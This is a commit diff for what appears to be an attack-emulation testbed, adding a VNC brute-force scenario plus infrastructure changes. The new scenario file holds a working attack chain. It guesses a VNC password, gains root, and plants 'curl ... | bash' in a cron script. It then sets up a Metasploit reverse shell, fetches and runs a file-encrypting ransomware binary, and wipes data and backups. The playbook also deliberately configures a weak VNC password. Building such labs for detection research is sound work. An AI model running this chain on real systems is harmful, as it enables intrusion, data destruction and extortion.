Vnc bruteforce

ansible/run/scenario3/main.yml

@@ -37,6 +37,7 @@
           mode: '0755'
       loop:
           - scenario_3_a_a
+          - scenario_3_a_b
           - upgrade
           - scenario_3_b
           - scenario_3_c
@@ -61,18 +62,30 @@
          - attackmate
          - exploit
 
-    - name: "Run Scenario 3 b"
+    - name: "Run Scenario 3 a b"
       become: True
       become_user: "{{attacker_user}}"
       ansible.builtin.shell:
-          cmd: "/usr/local/bin/attackmate-tmux scenario_3_b.yml"
+          cmd: "/usr/local/bin/attackmate-tmux scenario_3_a_b.yml"
           chdir: "{{user_home.stdout}}"
       tags:
-         - scenario_3_b
+         - scenario_3_a_b 
          - metasploit
          - attackmate
          - exploit
-
+
+    - name: "Run Scenario 3 b"
+      become: True
+     become_user: "{{attacker_user}}"
+     ansible.builtin.shell:
+         cmd: "/usr/local/bin/attackmate-tmux scenario_3_b.yml"
+         chdir: "{{user_home.stdout}}"
+     tags:
+        - scenario_3_b
+        - metasploit
+        - attackmate
+        - exploit
+
     - name: "Run Scenario 3 c"
       become: True
       become_user: "{{attacker_user}}"
@@ -84,7 +97,7 @@
          - metasploit
          - attackmate
          - exploit
-
+         
     - name: "Run Scenario 3 d"
       become: True
       become_user: "{{attacker_user}}"
@@ -96,3 +109,4 @@
          - metasploit
          - attackmate
          - exploit
+

ansible/run/scenario3/templates/scenario_3_a_a.j2

@@ -1,6 +1,6 @@
 ####################
 #
-# Scenario 1 a a
+# Scenario 3 a a
 #
 ####################
 vars:

ansible/run/scenario3/templates/scenario_3_a_b.j2

@@ -0,0 +1,173 @@
+####################
+#
+# Scenario 3 a b 
+#
+####################
+
+vars:
+  $SERVER_ADDRESS: 192.42.0.254
+  $ATTACKER_ADDRESS: 192.42.1.174
+  $DNS_SERVER: 192.42.0.233
+  $LISTA:
+  - "password1"
+  - "password2"
+  - "password3"
+  - "password4"
+  - "password5"
+  - "123"
+  - "12345"
+  - "12345678"
+
+commands:
+  - type: loop
+    break_if: $RESULT_STDOUT =~ vnc_connected
+    cmd: "items(LISTA)"
+    commands:
+    - type: vnc
+      creates_session: foothold
+      username: john
+      password: $LOOP_ITEM 
+      hostname: $SERVER_ADDRESS
+      port: "5901"
+      cmd: move
+      x: 5
+      y: 5
+
+  - type: vnc
+    session: foothold
+    cmd: click
+  - type: sleep
+    seconds: 3
+
+  - type: vnc
+    session: foothold
+    cmd: type
+    input: "terminal"
+
+  - type: sleep
+    seconds: 3
+
+  - type: vnc
+    session: foothold
+    cmd: key
+    key: "enter"
+
+  - type: sleep
+    seconds: 3
+
+  - type: vnc
+    session: foothold
+    cmd: type
+    input: "sudo -i"
+
+  - type: sleep
+    seconds: 3
+
+  - type: vnc
+    session: foothold
+    cmd: key
+    key: "enter"
+
+  - type: sleep
+    seconds: 2
+
+  - type: vnc
+    session: foothold
+    cmd: type
+    input: echo "curl http://$ATTACKER_ADDRESS:8888/install.sh | bash" >> /media/share/healthcheck_cron.sh
+
+  - type: sleep
+    seconds: 2
+
+  - type: vnc
+    session: foothold
+    cmd: key
+    key: "enter"
+
+  - type: sleep
+    seconds: 1
+
+  - type: mktemp
+    cmd: file
+    variable: RSHELL
+
+  - type: msf-payload
+    cmd: cmd/unix/python/meterpreter/reverse_tcp
+    payload_options:
+      LHOST: $ATTACKER_ADDRESS
+      LPORT: "4444"
+    local_path: $RSHELL
+
+  - type: msf-module
+    creates_session: movement
+    cmd: exploit/multi/handler
+    payload: "cmd/unix/python/meterpreter/reverse_tcp"
+    payload_options:
+      LHOST: $ATTACKER_ADDRESS
+      LPORT: "4444"
+    background: true
+    kill_on_exit: true
+
+  - type: webserv
+    local_path: $RSHELL
+    port: 8888
+    background: True
+    kill_on_exit: true
+
+  - type: vnc
+    cmd: close
+    session: foothold
+
+#################### MOVED ############################################
+  - type: msf-session
+    session: movement
+    cmd: sysinfo
+
+  - type: msf-session
+    session: movement
+    cmd: getuid
+
+  - type: msf-session
+    session: movement
+    cmd: shell
+
+  # Prepare for upgradeshell
+  - type: setvar
+    cmd: movement
+    variable: $UPGRADESESSION
+
+  - type: include
+    local_path: upgrade.yml
+
+  - type: msf-session
+    session: movement
+    cmd: curl http://$ATTACKER_ADDRESS/donotcry > /opt/donotcry
+
+  - type: msf-session
+    session: movement
+    cmd: /lib64/ld-linux-x86-64.so.2 /opt/donotcry encrypt /media/data/Images
+
+  - type: msf-session
+    session: movement
+    cmd: find /media/data/Images
+
+  - type: msf-session
+    session: movement
+    cmd: cat /etc/passwd
+
+  - type: msf-session
+    session: movement
+    cmd: userdel -f john
+
+  - type: msf-session
+    session: movement
+    cmd: rm -rf /media/data/*
+
+  - type: msf-session
+    session: movement
+    cmd: rm -rf /var/backups/*
+
+  - type: msf-session
+    session: movement
+    cmd: systemctl stop exim4.service
+

ansible/run/scenario3/templates/scenario_3_b.j2

@@ -1,6 +1,6 @@
 ####################
 #
-# Scenario 1 a a
+# Scenario 3 b
 #
 ####################
 vars:

ansible/run/scenario3/templates/scenario_3_c.j2

@@ -1,6 +1,6 @@
 ####################
 #
-# Scenario 1 a a
+# Scenario 3 c
 #
 ####################
 vars:

packer/firewall/playbook/main.yaml

@@ -83,6 +83,7 @@
             - { action: DNAT, source: inet, dest: "dmz:$REPOSERVER:22", proto: tcp, dest_port: 10022 }
             - { action: DNAT, source: inet, dest: "dmz:$REPOSERVER", proto: tcp, dest_port: 3389 }
             - { action: DNAT, source: inet, dest: "dmz:$REPOSERVER", proto: tcp, dest_port: 4501 }
+            - { action: DNAT, source: inet, dest: "dmz:$REPOSERVER", proto: tcp, dest_port: 5901 }
             - Reposerver to Linux-Share
             - { action: ACCEPT, source: dmz, dest: "lan:$LINUXSHARE", proto: tcp, dest_port: 1881 }
             - { action: ACCEPT, source: dmz, dest: "lan:$LINUXSHARE", proto: tcp, dest_port: 111,2049 }

packer/repository/playbook/main.yaml

@@ -26,6 +26,11 @@
                   hostname_fqdn: "puppet.aecid-testbed.local"
                   hostname_ip: "172.17.100.122"
           - role: aeciduser
+          - role: weaklinuxuser
+            vars:
+              weaklinuxuser_sudo: False
+              weaklinuxuser_groups:
+                - sudo
             vars:
                   # pass: aecid
                   aeciduser_pass: "$6$9AqxTPJqYsFXwgPN$xAC4y1Vndk00EaBCuFcJC37BYDYYVAgt9SHymg15KSdKddZnwG.SsQaJvHarH4DYQj3tuboeLa4G5EfL7itcC0"
@@ -35,11 +40,12 @@
           - role: manage_unattended_upgrades
           - role: auditd
           - role: mate-desktop
-          - role: weaklinuxuser
+          - role: tightvnc
             vars:
-              weaklinuxuser_sudo: False
-              weaklinuxuser_groups:
-                - sudo
+                  vnc_user: "john"
+                  vnc_password: "12345678"
+                  vnc_display: ":1"
+                  vnc_port: 5901
           - role: puppetserver
           - role: disableresolved
           - role: acct

packer/repository/playbook/requirements.yml

@@ -44,4 +44,6 @@ roles:
   - src: https://github.com/ait-testbed/atb-ansible-puppetserver.git
     version: v1.0.0
     name: puppetserver
-
+  - src: https://github.com/ait-testbed/atb-ansible-tightvnc.git
+    version: v1.0.0
+    name: tightvnc

terragrunt/attacker/module/fetch_network_uuid.sh

@@ -0,0 +1,18 @@
+#!/bin/bash
+
+# Exit if any of the intermediate steps fail
+set -e
+
+# Extract "network_name" arguments from the input into
+# NETWORK_NAME and shell variables.
+# jq will ensure that the values are properly quoted
+# and escaped for consumption by the shell.
+eval "$(jq -r '@sh "NETWORK_NAME=\(.network_name)"')"
+
+# data fetching
+UUID=$(openstack network list --project "$OS_PROJECT_ID" --name "$NETWORK_NAME" -f value -c ID)
+
+# Safely produce a JSON object containing the result value.
+# jq will ensure that the value is properly quoted
+# and escaped to produce a valid JSON string.
+jq -n --arg uuid "$UUID" '{"uuid":$uuid}'

terragrunt/bootstrap/module/main.tf

@@ -69,7 +69,7 @@ resource "openstack_compute_instance_v2" "inet-dns" {
   user_data    = local.ext_dns_userdata_file == null ? null : data.template_cloudinit_config.cloudinitdns[0].rendered
 
   network {
-    name = "internet"
+    uuid = "${openstack_networking_network_v2.internet.id}"
     fixed_ip_v4 = cidrhost(var.subnet_cidrs["inet"],514)
   }
 
@@ -220,27 +220,27 @@ resource "openstack_compute_instance_v2" "inet-fw" {
   user_data    = local.fw_userdata_file == null ? null : data.template_cloudinit_config.cloudinitinetfw[0].rendered
 
   network {
-    name = "internet"
+    uuid = "${openstack_networking_network_v2.internet.id}"
     fixed_ip_v4 = cidrhost(var.subnet_cidrs["inet"],254)
   }
 
   network {
-    name = "lan"
+    uuid = "${openstack_networking_network_v2.lan.id}"
     fixed_ip_v4 = cidrhost(var.subnet_cidrs["lan"],254)
   }
 
   network {
-    name = "dmz"
+    uuid = "${openstack_networking_network_v2.dmz.id}"
     fixed_ip_v4 = cidrhost(var.subnet_cidrs["dmz"],254)
   }
 
   network {
-    name = "admin"
+    uuid = "${openstack_networking_network_v2.admin.id}"
     fixed_ip_v4 = cidrhost(var.subnet_cidrs["admin"],254)
   }
 
   network {
-    name = "user"
+    uuid = "${openstack_networking_network_v2.user.id}"
     fixed_ip_v4 = cidrhost(var.subnet_cidrs["user"],254)
   }
 
@@ -298,30 +298,32 @@ resource "openstack_compute_instance_v2" "mgmt" {
   user_data    = local.mgmt_userdata_file == null ? null : data.template_cloudinit_config.cloudinitmgmt[0].rendered
 
   network {
-    name = "internet"
+    uuid = "${openstack_networking_network_v2.internet.id}"
     fixed_ip_v4 = local.mgmt_ips.internet
   }
 
   network {
-    name = "lan"
+    uuid = "${openstack_networking_network_v2.lan.id}"
     fixed_ip_v4 = local.mgmt_ips.lan
   }
 
   network {
-    name = "dmz"
+    uuid = "${openstack_networking_network_v2.dmz.id}"
     fixed_ip_v4 = local.mgmt_ips.dmz
   }
 
+
   network {
-    name = "admin"
+    uuid = "${openstack_networking_network_v2.admin.id}"
     fixed_ip_v4 = local.mgmt_ips.admin
   }
 
   network {
-    name = "user"
+    uuid = "${openstack_networking_network_v2.user.id}"
     fixed_ip_v4 = local.mgmt_ips.user
   }
 
+
   depends_on = [
      openstack_networking_network_v2.dmz,
      openstack_networking_network_v2.internet,